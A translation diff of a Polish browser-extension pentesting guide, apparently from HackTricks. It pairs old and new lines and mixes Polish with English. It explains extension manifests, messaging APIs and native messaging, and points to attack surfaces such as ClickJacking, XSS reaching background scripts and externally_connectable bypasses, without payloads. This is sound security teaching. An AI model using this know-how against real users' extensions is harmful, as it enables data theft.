Aby programowo wstrzyknąć skrypt treści, rozszerzenie musi mieć [uprawnienia hosta](https://developer.chrome.com/docs/extensions/reference/permissions) dla strony, do której skrypty mają być wstrzyknięte. Uprawnienia te mogą być zabezpieczone albo przez **zażądanie ich** w manifeście rozszerzenia, albo tymczasowo poprzez [**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab).
Aby programatycznie wstrzyknąć content script, rozszerzenie musi posiadać [host permissions](https://developer.chrome.com/docs/extensions/reference/permissions) dla strony, do której mają być wstrzyknięte skrypty. Uprawnienia te można uzyskać albo poprzez **zadeklarowanie ich** w manifeście rozszerzenia, albo tymczasowo za pomocą [**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab).
#### Przykład rozszerzenia opartego na activeTab
```json:manifest.json
@ -125,7 +125,7 @@ Aby programowo wstrzyknąć skrypt treści, rozszerzenie musi mieć [uprawnienia
}
}
```
- **Wstrzyknij plik JS po kliknięciu:**
- **Inject plik JS po kliknięciu:**
```javascript
// content-script.js
document.body.style.backgroundColor = "orange"
@ -138,7 +138,7 @@ files: ["content-script.js"],
})
})
```
- **Wstrzyknij funkcję** po kliknięciu:
- **Wstrzyknij funkcję** przy kliknięciu:
```javascript
//service-worker.js - Inject a function
function injectedFunction() {
@ -152,7 +152,7 @@ func: injectedFunction,
})
})
```
#### Przykład z uprawnieniami skryptów
#### Przykład z uprawnieniami do skryptowania
```javascript
// service-workser.js
chrome.scripting.registerContentScripts([
@ -167,19 +167,19 @@ js: ["contentScript.js"],
// Another example
chrome.tabs.executeScript(tabId, { file: "content_script.js" })
```
Aby dodać lub wykluczyć więcej adresów URL, można również użyć **`include_globs`** i **`exclude_globs`**.
Aby uwzględnić lub wykluczyć więcej adresów URL, można również użyć **`include_globs`** i **`exclude_globs`**.
### Skrypty zawartości `run_at`
### Skrypty treści `run_at`
Pole `run_at` kontroluje **kiedy pliki JavaScript są wstrzykiwane do strony internetowej**. Preferowana i domyślna wartość to `"document_idle"`.
Pole `run_at` kontroluje **kiedy pliki JavaScript są wstrzykiwane na stronę**. Preferowaną i domyślną wartością jest `"document_idle"`.
Możliwe wartości to:
Dostępne wartości to:
- **`document_idle`**: Kiedy tylko to możliwe
- **`document_start`**: Po załadowaniu jakichkolwiek plików z `css`, ale przed skonstruowaniem jakiegokolwiek innego DOM lub uruchomieniem jakiegokolwiek innego skryptu.
- **`document_end`**: Natychmiast po zakończeniu DOM, ale przed załadowaniem subzasobów, takich jak obrazy i ramki.
- **`document_idle`**: gdy tylko możliwe
- **`document_start`**: po plikach z `css`, ale zanim zostanie zbudowany jakikolwiek inny DOM lub zanim zostanie uruchomiony jakikolwiek inny skrypt.
- **`document_end`**: bezpośrednio po ukończeniu DOM, ale zanim załadują się subresources takie jak obrazy i ramki.
#### Poprzez `manifest.json`
#### Za pomocą `manifest.json`
```json
{
"name": "My extension",
@ -195,7 +195,7 @@ Możliwe wartości to:
}
```
Via **`service-worker.js`**
Za pomocą **`service-worker.js`**
```javascript
chrome.scripting.registerContentScripts([
{
@ -208,18 +208,18 @@ js: ["contentScript.js"],
```
### `background`
Wiadomości wysyłane przez skrypty treści są odbierane przez **background page**, która odgrywa centralną rolę w koordynowaniu komponentów rozszerzenia. Należy zauważyć, że background page utrzymuje się przez cały czas życia rozszerzenia, działając dyskretnie bez bezpośredniej interakcji użytkownika. Posiada własny Document Object Model (DOM), co umożliwia złożone interakcje i zarządzanie stanem.
Wiadomości wysyłane przez content scripts są odbierane przez **stronę w tle**, która pełni centralną rolę w koordynacji komponentów rozszerzenia. Co istotne, strona w tle utrzymuje się przez cały czas działania rozszerzenia, działając dyskretnie bez bezpośredniej interakcji z użytkownikiem. Posiada własny Document Object Model (DOM), co umożliwia złożone interakcje i zarządzanie stanem.
**Kluczowe punkty**:
**Najważniejsze punkty**:
- **Rola Background Page:** Działa jako centrum nerwowe rozszerzenia, zapewniając komunikację i koordynację między różnymi częściami rozszerzenia.
- **Trwałość:** To zawsze obecny byt, niewidoczny dla użytkownika, ale integralny dla funkcjonalności rozszerzenia.
- **Automatyczne generowanie:** Jeśli nie jest wyraźnie zdefiniowane, przeglądarka automatycznie utworzy background page. Ta automatycznie generowana strona będzie zawierać wszystkie skrypty tła określone w manifeście rozszerzenia, zapewniając płynne działanie zadań tła rozszerzenia.
- **Rola strony w tle:** Działa jak centrum nerwowe rozszerzenia, zapewniając komunikację i koordynację między jego częściami.
- **Trwałość:** Jest elementem stale obecnym, niewidocznym dla użytkownika, ale kluczowym dla działania rozszerzenia.
- **Automatyczne generowanie:** Jeśli nie jest jawnie zdefiniowana, przeglądarka automatycznie utworzy stronę w tle. Taka automatycznie wygenerowana strona będzie zawierać wszystkie background scripts określone w manifeście rozszerzenia, zapewniając płynne działanie zadań w tle rozszerzenia.
> [!TIP]
> Wygoda zapewniana przez przeglądarkę w automatycznym generowaniu background page (gdy nie jest wyraźnie zadeklarowana) zapewnia, że wszystkie niezbędne skrypty tła są zintegrowane i działają, upraszczając proces konfiguracji rozszerzenia.
> Wygoda zapewniona przez przeglądarkę poprzez automatyczne generowanie strony w tle (gdy nie jest ona jawnie zadeklarowana) sprawia, że wszystkie niezbędne background scripts są zintegrowane i operacyjne, upraszczając proces konfiguracji rozszerzenia.
Przykład skryptu tła:
Przykładowy background script:
```js
chrome.runtime.onMessage.addListener((request, sender, sendResponse) => {
if (request == "explain") {
@ -227,34 +227,34 @@ chrome.tabs.create({ url: "https://example.net/explanation" })
}
})
```
Używa [runtime.onMessage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/onMessage) do nasłuchiwania wiadomości. Gdy otrzymana zostanie wiadomość `"explain"`, używa [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) do otwarcia strony w nowej karcie.
Używa [runtime.onMessage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/onMessage) do nasłuchiwania wiadomości. Gdy zostanie odebrana wiadomość `"explain"`, używa [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) aby otworzyć stronę w nowej karcie.
Aby debugować skrypt w tle, możesz przejść do **szczegółów rozszerzenia i zbadać serwis worker,** co otworzy narzędzia deweloperskie z skryptem w tle:
Aby debugować background script możesz przejść do **extension details and inspect the service worker,** co otworzy developer tools z background script:
<figure><img src="https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/browser-extension-pentesting-methodology/broken-reference" alt=""><figcaption></figcaption></figure>
### Strony opcji i inne
### Options pages and other
Rozszerzenia przeglądarki mogą zawierać różne rodzaje stron:
Browser extensions mogą zawierać różne rodzaje stron:
- **Strony akcji** są wyświetlane w **rozwijanym menu, gdy kliknięta jest ikona rozszerzenia.**
- Strony, które rozszerzenie **załadowuje w nowej karcie.**
- **Strony opcji**: Ta strona wyświetla się na górze rozszerzenia po kliknięciu. W poprzednim manifeście w moim przypadku mogłem uzyskać dostęp do tej strony w `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` lub klikając:
- **Action pages** are displayed in a **drop-down when the extension ico**n is clicked.
- Pages that the extension will **load in a new tab**.
- **Option Pages**: Ta strona wyświetla się nad interfejsem rozszerzenia po kliknięciu. W poprzednim manifest In my case I was able to access this page in `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` or clicking:
<figure><img src="../../images/image (24).png" alt="" width="375"><figcaption></figcaption></figure>
Zauważ, że te strony nie są trwałe jak strony w tle, ponieważ ładują dynamicznie treści w zależności od potrzeb. Mimo to, dzielą pewne możliwości z stroną w tle:
Zwróć uwagę, że te strony nie są persistent jak background pages, ponieważ ładują zawartość dynamicznie w razie potrzeby. Mimo to, dzielą pewne możliwości z background page:
- **Komunikacja z skryptami treści:** Podobnie jak strona w tle, te strony mogą odbierać wiadomości od skryptów treści, ułatwiając interakcję w ramach rozszerzenia.
- **Dostęp do specyficznych API rozszerzenia:** Te strony mają pełny dostęp do specyficznych API rozszerzenia, w zależności od uprawnień zdefiniowanych dla rozszerzenia.
- **Communication with Content Scripts:** Podobnie jak background page, te strony mogą otrzymywać wiadomości od content scripts, ułatwiając interakcję w ramach rozszerzenia.
- **Access to Extension-Specific APIs:** Te strony mają pełny dostęp do extension-specific APIs, zgodnie z uprawnieniami zdefiniowanymi dla rozszerzenia.
### `permissions` & `host_permissions`
**`permissions`** i **`host_permissions`** to wpisy z `manifest.json`, które wskazują **jakie uprawnienia** ma rozszerzenie przeglądarki (przechowywanie, lokalizacja...) oraz **na jakich stronach internetowych**.
**`permissions`** i **`host_permissions`** to wpisy w `manifest.json`, które wskazują, **które permissions** posiada rozszerzenie (storage, location...) oraz na **których stronach WWW**.
Ponieważ rozszerzenia przeglądarki mogą być tak **uprzywilejowane**, złośliwe lub skompromitowane mogłyby umożliwić atakującemu **różne sposoby kradzieży wrażliwych informacji i szpiegowania użytkownika**.
Ponieważ rozszerzenia przeglądarki mogą być bardzo **privileged**, złośliwe rozszerzenie lub takie, które zostało skompromitowane, może umożliwić atakującemu **różne sposoby kradzieży wrażliwych informacji i szpiegowania użytkownika**.
Sprawdź, jak te ustawienia działają i jak mogą być nadużywane w:
Sprawdź, jak te ustawienia działają i jak mogą zostać nadużyte w:
{{#ref}}
browext-permissions-and-host_permissions.md
@ -262,13 +262,14 @@ browext-permissions-and-host_permissions.md
### `content_security_policy`
**Polityka bezpieczeństwa treści** może być również zadeklarowana w `manifest.json`. Jeśli jest zdefiniowana, może być **vulnerable**.
A **content security policy** może być zadeklarowana również w `manifest.json`. Jeśli jest zdefiniowana, może być **vulnerable**.
Domyślne ustawienie dla stron rozszerzeń przeglądarki jest dość restrykcyjne:
```bash
script-src 'self'; object-src 'self';
```
Aby uzyskać więcej informacji na temat CSP i potencjalnych obejść, sprawdź:
Aby uzyskać więcej informacji o CSP i potencjalnych obejściach zobacz:
{{#ref}}
../content-security-policy-csp-bypass/
@ -276,7 +277,7 @@ Aby uzyskać więcej informacji na temat CSP i potencjalnych obejść, sprawdź:
### `web_accessible_resources`
Aby strona internetowa mogła uzyskać dostęp do strony rozszerzenia przeglądarki, na przykład strony `.html`, ta strona musi być wymieniona w polu **`web_accessible_resources`** w `manifest.json`.\
Aby strona internetowa mogła uzyskać dostęp do strony rozszerzenia przeglądarki, na przykład pliku `.html`, ta strona musi być wymieniona w polu **`web_accessible_resources`** w `manifest.json`.\
Na przykład:
```javascript
{
@ -294,67 +295,68 @@ Na przykład:
...
}
```
Te strony są dostępne pod adresem URL takim jak:
Te strony są dostępne pod adresami URL takimi jak:
```
chrome-extension://<extension-id>/message.html
```
W publicznych rozszerzeniach **identyfikator rozszerzenia jest dostępny**:
In public extensions the **extension-id is accesible**:
<figure><img src="../../images/image (1194).png" alt="" width="375"><figcaption></figcaption></figure>
Jednakże, jeśli parametr `manifest.json` **`use_dynamic_url`** jest używany, ten **identyfikator może być dynamiczny**.
Although, if the `manifest.json` parameter **`use_dynamic_url`** is used, this **id can be dynamic**.
> [!TIP]
> Zauważ, że nawet jeśli strona jest tutaj wymieniona, może być **chroniona przed ClickJacking** dzięki **Polityce Bezpieczeństwa Treści**. Dlatego musisz to również sprawdzić (sekcja frame-ancestors) przed potwierdzeniem, że atak ClickJacking jest możliwy.
> Note that even if a page is mentioned here, it might be **protected against ClickJacking** thanks to the **Content Security Policy**. So you also need to check it (frame-ancestors section) before confirming a ClickJacking attack is possible.
Being allowed to access these pages make these pages **potentially vulnerable ClickJacking**:
Dopuszczenie dostępu do tych stron sprawia, że są one **potencjalnie podatne na ClickJacking**:
{{#ref}}
browext-clickjacking.md
{{#endref}}
> [!TIP]
> Zezwolenie na ładowanie tych stron tylko przez rozszerzenie, a nie przez losowe adresy URL, może zapobiec atakom ClickJacking.
> Allowing these pages to be loaded only by the extension and not by random URLs could prevent ClickJacking attacks.
> [!CAUTION]
> Zauważ, że strony z **`web_accessible_resources`** oraz inne strony rozszerzenia również mogą **kontaktować się z skryptami w tle**. Więc jeśli jedna z tych stron jest podatna na **XSS**, może to otworzyć większą lukę.
> Note that the pages from **`web_accessible_resources`** and other pages of the extension are also capable of **contacting background scripts**. So if one of these pages is vulnerable to **XSS** it could open a bigger vulnerability.
>
> Ponadto, zauważ, że możesz otwierać tylko strony wskazane w **`web_accessible_resources`** wewnątrz iframe, ale z nowej karty można uzyskać dostęp do dowolnej strony w rozszerzeniu, znając identyfikator rozszerzenia. Dlatego, jeśli znajdziesz XSS wykorzystujące te same parametry, może być to wykorzystane, nawet jeśli strona nie jest skonfigurowana w **`web_accessible_resources`**.
> Moreover, note that you can only open pages indicated in **`web_accessible_resources`** inside iframes, but from a new tab it's possible to access any page in the extension knowing the extension ID. Therefore, if an XSS is found abusing same parameters, it could be abused even if the page isn't configured in **`web_accessible_resources`**.
### `externally_connectable`
Zgodnie z [**dokumentacją**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable), właściwość manifestu `"externally_connectable"` deklaruje **które rozszerzenia i strony internetowe mogą łączyć się** z Twoim rozszerzeniem za pomocą [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) i [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage).
A per the [**docs**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable), The `"externally_connectable"` manifest property declares **which extensions and web pages can connect** to your extension via [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) and [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage).
- Jeśli klucz **`externally_connectable`** **nie** jest zadeklarowany w manifeście Twojego rozszerzenia lub jest zadeklarowany jako **`"ids": ["*"]`**, **wszystkie rozszerzenia mogą się łączyć, ale żadne strony internetowe nie mogą się łączyć**.
- Jeśli **określone identyfikatory są podane**, jak w `"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`, **tylko te aplikacje** mogą się łączyć.
- Jeśli **określone dopasowania** są podane, te aplikacje webowe będą mogły się łączyć:
- If the **`externally_connectable`** key is **not** declared in your extension's manifest or it's declared as **`"ids": ["*"]`**, **all extensions can connect, but no web pages can connect**.
- If **specific IDs are specified**, like in `"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`, **only those applications** can connect.
- If **matches** are specified, those web apps will be able to connect:
```json
"matches": [
"https://*.google.com/*",
"*://*.chromium.org/*",
```
- Jeśli jest określone jako puste: **`"externally_connectable": {}`**, żadna aplikacja ani strona internetowa nie będą mogły się połączyć.
- If it's specified as empty: **`"externally_connectable": {}`**, no app or web will be able to connect.
Im **mniej rozszerzeń i adresów URL** wskazanych tutaj, tym **mniejsza powierzchnia ataku**.
Im mniej wskazanych tutaj rozszerzeń i URL-i, tym mniejsza będzie powierzchnia ataku.
> [!CAUTION]
> Jeśli strona internetowa **wrażliwa na XSS lub przejęcie** jest wskazana w **`externally_connectable`**, atakujący będzie mógł **wysyłać wiadomości bezpośrednio do skryptu w tle**, całkowicie omijając Content Script i jego CSP.
> If a web page **vulnerable to XSS or takeover** is indicated in **`externally_connectable`**, an attacker will be able to **send messages directly to the background script**, completely bypassing the Content Script and its CSP.
>
> Dlatego jest to **bardzo potężne obejście**.
> Therefore, this is a **very powerful bypass**.
>
> Co więcej, jeśli klient zainstaluje złośliwe rozszerzenie, nawet jeśli nie jest dozwolone do komunikacji z wrażliwym rozszerzeniem, może wstrzyknąć **dane XSS w dozwolonej stronie internetowej** lub nadużyć API **`WebRequest`** lub **`DeclarativeNetRequest`**, aby manipulować żądaniami na docelowej domenie, zmieniając żądanie strony dla **pliku JavaScript**. (Zauważ, że CSP na docelowej stronie może zapobiec tym atakom). Ten pomysł pochodzi [**z tego opisu**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability).
> Moreover, if the client installs a rouge extension, even if it isn't allowed to communicate with the vulnerable extension, it could inject **XSS data in an allowed web page** or abuse **`WebRequest`** or **`DeclarativeNetRequest`** APIs to manipulate requests on a targeted domain altering a page's request for a **JavaScript file**. (Note that CSP on the targeted page could prevent these attacks). This idea comes [**from this writeup**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability).
## Podsumowanie komunikacji
## Communication summary
### Rozszerzenie <--> WebApp
### Extension <--> WebApp
Aby komunikować się między skryptem treści a stroną internetową, zazwyczaj używane są wiadomości post. Dlatego w aplikacji internetowej zazwyczaj znajdziesz wywołania funkcji **`window.postMessage`** oraz w skrypcie treści nasłuchiwacze, takie jak **`window.addEventListener`**. Należy jednak zauważyć, że rozszerzenie może również **komunikować się z aplikacją internetową, wysyłając wiadomość Post** (a zatem strona powinna się tego spodziewać) lub po prostu sprawić, że strona załaduje nowy skrypt.
Aby komunikować się między content script a stroną webową, zwykle używa się post messages. W aplikacji webowej zazwyczaj znajdziesz wywołania funkcji **`window.postMessage`**, a w content script nasłuchiwacze takie jak **`window.addEventListener`**. Zauważ jednak, że rozszerzenie może też **komunikować się z aplikacją webową wysyłając Post Message** (i w związku z tym strona powinna się tego spodziewać) lub po prostu spowodować załadowanie nowego skryptu przez stronę.
### Wewnątrz rozszerzenia
### Inside the extension
Zazwyczaj funkcja **`chrome.runtime.sendMessage`** jest używana do wysyłania wiadomości wewnątrz rozszerzenia (zazwyczaj obsługiwana przez skrypt `background`), a aby ją odebrać i obsłużyć, deklarowany jest nasłuchiwacz wywołujący **`chrome.runtime.onMessage.addListener`**.
Zazwyczaj do wysyłania wiadomości wewnątrz rozszerzenia używana jest funkcja **`chrome.runtime.sendMessage`** (zwykle obsługiwana przez `background` script), a aby ją odbierać i obsługiwać, deklaruje się listener wywołujący **`chrome.runtime.onMessage.addListener`**.
Możliwe jest również użycie **`chrome.runtime.connect()`**, aby mieć stałe połączenie zamiast wysyłania pojedynczych wiadomości; można go używać do **wysyłania** i **odbierania** **wiadomości**, jak w poniższym przykładzie:
Można też użyć **`chrome.runtime.connect()`** do utworzenia stałego połączenia zamiast wysyłać pojedyncze wiadomości; można go użyć do **wysyłania** i **odbierania** **wiadomości**, jak w poniższym przykładzie:
<details>
@ -389,19 +391,19 @@ console.log("Content script received message from background script:", msg)
```
</details>
Możliwe jest również wysyłanie wiadomości z skryptu w tle do skryptu treści znajdującego się w określonej karcie, wywołując **`chrome.tabs.sendMessage`**, gdzie będziesz musiał wskazać **ID karty**, do której chcesz wysłać wiadomość.
Jest też możliwe wysyłanie wiadomości ze skryptu w tle do skryptu treści znajdującego się w konkretnej karcie, wywołując **`chrome.tabs.sendMessage`**, gdzie musisz wskazać **ID karty**, do której chcesz wysłać wiadomość.
### Z dozwolonego `externally_connectable` do rozszerzenia
### Z dozwolonych `externally_connectable` do rozszerzenia
**Aplikacje internetowe i zewnętrzne rozszerzenia przeglądarki dozwolone** w konfiguracji `externally_connectable` mogą wysyłać żądania za pomocą:
**Aplikacje webowe i zewnętrzne rozszerzenia przeglądarki** dozwolone w konfiguracji `externally_connectable` mogą wysyłać żądania używając :
```javascript
chrome.runtime.sendMessage(extensionId, ...
```
Gdzie należy wspomnieć o **identyfikatorze rozszerzenia**.
Tam, gdzie trzeba wspomnieć o **extension ID**.
### Native Messaging
Możliwe jest, aby skrypty w tle komunikowały się z binariami w systemie, które mogą być **narażone na krytyczne luki, takie jak RCE** jeśli ta komunikacja nie jest odpowiednio zabezpieczona. [Więcej na ten temat później](#native-messaging).
Skrypty w tle mogą komunikować się z plikami binarnymi w systemie, co może być **podatne na krytyczne podatności, takie jak RCEs**, jeśli ta komunikacja nie jest właściwie zabezpieczona. [Więcej na ten temat później](#native-messaging).
```javascript
chrome.runtime.sendNativeMessage(
"com.my_company.my_application",
@ -411,11 +413,11 @@ console.log("Received " + response)
}
)
```
## Web **↔︎** Komunikacja Skryptów Treści
## Web **↔︎** Komunikacja z Content Script
Środowiska, w których działają **skrypty treści**, oraz gdzie istnieją strony hosta, są **oddzielone** od siebie, zapewniając **izolację**. Pomimo tej izolacji, obie strony mają możliwość interakcji z **Modelem Obiektów Dokumentu (DOM)** strony, wspólnym zasobem. Aby strona hosta mogła nawiązać komunikację z **skryptem treści**, lub pośrednio z rozszerzeniem przez skrypt treści, konieczne jest wykorzystanie **DOM**, który jest dostępny dla obu stron jako kanał komunikacyjny.
Środowiska, w których działają **content scripts**, oraz te, w których istnieją strony hostujące, są od siebie **oddzielone**, zapewniając **izolację**. Mimo tej izolacji obie strony mają możliwość interakcji z **Model Obiektu Dokumentu (DOM)** — wspólnym zasobem. Aby strona hostująca mogła komunikować się z **content script**, lub pośrednio z rozszerzeniem przez content script, musi użyć **DOM** dostępnego dla obu stron jako kanału komunikacji.
### Wiadomości Post
### Post Messages
```javascript:content-script.js
// This is like "chrome.runtime.sendMessage" but to maintain the connection
var port = chrome.runtime.connect()
@ -450,15 +452,16 @@ window.postMessage(
false
)
```
Bezpieczna komunikacja Post Message powinna sprawdzać autentyczność otrzymanej wiadomości, co można zrobić, sprawdzając:
A secure Post Message communication should check the authenticity of the received message, this can be done checking:
- **`event.isTrusted`**: To jest prawda tylko wtedy, gdy zdarzenie zostało wywołane przez działanie użytkownika
- Skrypt treści może oczekiwać wiadomości tylko wtedy, gdy użytkownik wykona jakieś działanie
- **domena źródłowa**: może oczekiwać wiadomości tylko z dozwolonej listy domen.
- Jeśli używana jest wyrażenie regularne, należy być bardzo ostrożnym
- **Źródło**: `received_message.source !== window` może być użyte do sprawdzenia, czy wiadomość była **z tego samego okna**, w którym skrypt treści nasłuchuje.
- **`event.isTrusted`**: This is True only if the event was triggered by a users action
- The Content Script might expecting a message only if the user performs some action
- **origin domain**: może oczekiwać wiadomości tylko z dozwolonej listy domen.
- If a regex is used, be very careful
- **Source**: `received_message.source !== window` can be used to check if the message was **from the same window** where the Content Script is listening.
Powyższe kontrole, nawet jeśli są wdrożone, mogą być podatne, więc sprawdź na następującej stronie **potential Post Message bypasses**:
Poprzednie kontrole, nawet jeśli są przeprowadzane, mogą być podatne, więc sprawdź na następującej stronie **potencjalne obejścia Post Message**:
{{#ref}}
../postmessage-vulnerabilities/
@ -466,7 +469,8 @@ Poprzednie kontrole, nawet jeśli są przeprowadzane, mogą być podatne, więc
### Iframe
Innym możliwym sposobem komunikacji mogą być **adresy URL Iframe**, przykład można znaleźć w:
Innym możliwym sposobem komunikacji mogą być **Iframe URLs**, przykład znajdziesz w:
{{#ref}}
browext-xss-example.md
@ -474,21 +478,22 @@ browext-xss-example.md
### DOM
To nie jest "dokładnie" sposób komunikacji, ale **sieć i skrypt treści będą miały dostęp do DOM sieci**. Więc, jeśli **skrypt treści** odczytuje jakieś informacje z niego, **ufając DOM sieci**, sieć mogłaby **zmodyfikować te dane** (ponieważ sieć nie powinna być ufana, lub ponieważ sieć jest podatna na XSS) i **kompromitować skrypt treści**.
To nie jest "dokładnie" sposób komunikacji, ale **web i Content Script będą mieć dostęp do web DOM**. Jeśli **Content Script** odczytuje z niego jakieś informacje i **ufa web DOM**, web może **zmodyfikować te dane** (ponieważ web nie powinien być zaufany, lub ponieważ web jest podatny na XSS) i **skompro-mitować Content Script**.
Znajdziesz też przykład **DOM based XSS to compromise a browser extension** w:
Możesz również znaleźć przykład **XSS opartego na DOM, aby skompromitować rozszerzenie przeglądarki** w:
{{#ref}}
browext-xss-example.md
{{#endref}}
## Komunikacja Skryptu Treści **↔︎** Skryptu Tła
## Content Script **↔︎** Background Script Communication
Skrypt treści może używać funkcji [**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **lub** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage), aby wysłać **jednorazową wiadomość serializowalną w formacie JSON**.
A Content Script can use the functions [**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **or** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage) to send a **one-time JSON-serializable** message.
Aby obsłużyć **odpowiedź**, użyj zwróconego **Promise**. Chociaż, dla zachowania zgodności wstecznej, nadal możesz przekazać **callback** jako ostatni argument.
To handle the **response**, use the returned **Promise**. Although, for backward compatibility, you can still pass a **callback** as the last argument.
Wysyłanie żądania z **skryptu treści** wygląda tak:
Sending a request from a **content script** looks like this:
```javascript
;(async () => {
const response = await chrome.runtime.sendMessage({ greeting: "hello" })
@ -496,7 +501,7 @@ const response = await chrome.runtime.sendMessage({ greeting: "hello" })
console.log(response)
})()
```
Wysyłanie żądania z **rozszerzenia** (zwykle **skryptu w tle**). Przykład, jak wysłać wiadomość do skryptu treści w wybranej karcie:
Wysyłanie żądania z **extension** (zazwyczaj **background script**). Przykład wysyłania wiadomości do content script w wybranej karcie:
```javascript
// From https://stackoverflow.com/questions/36153999/how-to-send-a-message-between-chrome-extension-popup-and-content-script
;(async () => {
@ -509,7 +514,7 @@ const response = await chrome.tabs.sendMessage(tab.id, { greeting: "hello" })
console.log(response)
})()
```
Na **odbiorze** musisz ustawić [**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **nasłuchiwacz zdarzeń**, aby obsłużyć wiadomość. Wygląda to tak samo z poziomu skryptu treści lub strony rozszerzenia.
Po stronie **odbiorcy** musisz skonfigurować [**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **event listener**, aby obsłużyć wiadomość. Wygląda to tak samo zarówno w content script, jak i na extension page.
```javascript
// From https://stackoverflow.com/questions/70406787/javascript-send-message-from-content-js-to-background-js
chrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {
@ -521,15 +526,15 @@ sender.tab
if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
})
```
W podanym przykładzie, **`sendResponse()`** został wykonany w sposób synchroniczny. Aby zmodyfikować obsługę zdarzenia `onMessage` na asynchroniczne wykonanie `sendResponse()`, konieczne jest dodanie `return true;`.
W wyróżnionym przykładzie **`sendResponse()`** zostało wywołane synchronicznie. Aby zmodyfikować handler zdarzenia `onMessage` tak, by `sendResponse()` wykonywało się asynchronicznie, konieczne jest dodanie `return true;`.
Ważnym rozważeniem jest to, że w scenariuszach, w których wiele stron ma odbierać zdarzenia `onMessage`, **pierwsza strona, która wykona `sendResponse()`** dla konkretnego zdarzenia, będzie jedyną, która skutecznie dostarczy odpowiedź. Jakiekolwiek kolejne odpowiedzi na to samo zdarzenie nie będą brane pod uwagę.
Ważne jest, że w scenariuszach, gdzie wiele stron ma otrzymywać zdarzenia `onMessage`, **pierwsza strona, która wywoła `sendResponse()`** dla określonego zdarzenia, będzie jedyną, która faktycznie będzie mogła dostarczyć odpowiedź. Wszelkie kolejne odpowiedzi na to samo zdarzenie nie będą brane pod uwagę.
Podczas tworzenia nowych rozszerzeń, preferencje powinny być skierowane ku obietnicom zamiast do callbacków. Jeśli chodzi o użycie callbacków, funkcja `sendResponse()` jest uznawana za ważną tylko wtedy, gdy jest wykonywana bezpośrednio w kontekście synchronicznym lub jeśli obsługa zdarzenia wskazuje na operację asynchroniczną, zwracając `true`. Jeśli żaden z handlerów nie zwróci `true` lub jeśli funkcja `sendResponse()` zostanie usunięta z pamięci (zbieranie śmieci), callback związany z funkcją `sendMessage()` zostanie wywołany domyślnie.
Podczas tworzenia nowych rozszerzeń zaleca się używanie promises zamiast callbacks. W kontekście używania callbacks, funkcja `sendResponse()` jest uznawana za ważną tylko wtedy, gdy zostanie wywołana bezpośrednio w kontekście synchronicznym albo gdy handler zdarzenia sygnalizuje operację asynchroniczną poprzez zwrócenie `true`. Jeśli żaden z handlerów nie zwróci `true` lub jeśli funkcja `sendResponse()` zostanie usunięta z pamięci (garbage-collected), callback powiązany z `sendMessage()` zostanie domyślnie wywołany.
## Native Messaging
Rozszerzenia przeglądarki umożliwiają również komunikację z **binariami w systemie za pomocą stdin**. Aplikacja musi zainstalować plik json wskazujący na to w formacie json, takim jak:
Rozszerzenia przeglądarki umożliwiają również komunikację z **binaries in the system via stdin**. Aplikacja musi zainstalować plik json wskazujący to w formacie json podobnym do:
```json
{
"name": "com.my_company.my_application",
@ -539,14 +544,14 @@ Rozszerzenia przeglądarki umożliwiają również komunikację z **binariami w
"allowed_origins": ["chrome-extension://knldjmfmopnpolahpmmgbagdohdnhkik/"]
}
```
Gdzie `name` to ciąg przekazywany do [`runtime.connectNative()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-connectNative) lub [`runtime.sendNativeMessage()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-sendNativeMessage) w celu komunikacji z aplikacją z tła skryptów rozszerzenia przeglądarki. `path` to ścieżka do binarnego pliku, istnieje tylko 1 ważny `type`, którym jest stdio (użyj stdin i stdout), a `allowed_origins` wskazuje rozszerzenia, które mogą uzyskać do niego dostęp (i nie mogą mieć znaku wieloznacznego).
Gdzie `name` to string przekazywany do [`runtime.connectNative()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-connectNative) lub [`runtime.sendNativeMessage()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-sendNativeMessage) w celu komunikacji z aplikacją z background scripts rozszerzenia przeglądarki. `path` to ścieżka do binarki, istnieje tylko 1 poprawny `type` — stdio (używa stdin i stdout), a `allowed_origins` wskazują rozszerzenia, które mogą uzyskać do niego dostęp (i nie mogą zawierać wildcard).
Chrome/Chromium będzie szukać tego json w niektórych rejestrach systemu Windows oraz w niektórych ścieżkach w macOS i Linux (więcej informacji w [**docs**](https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging)).
Chrome/Chromium będzie szukać tego json w rejestrze Windows oraz w niektórych ścieżkach w macOS i Linux (więcej informacji w [**docs**](https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging)).
> [!TIP]
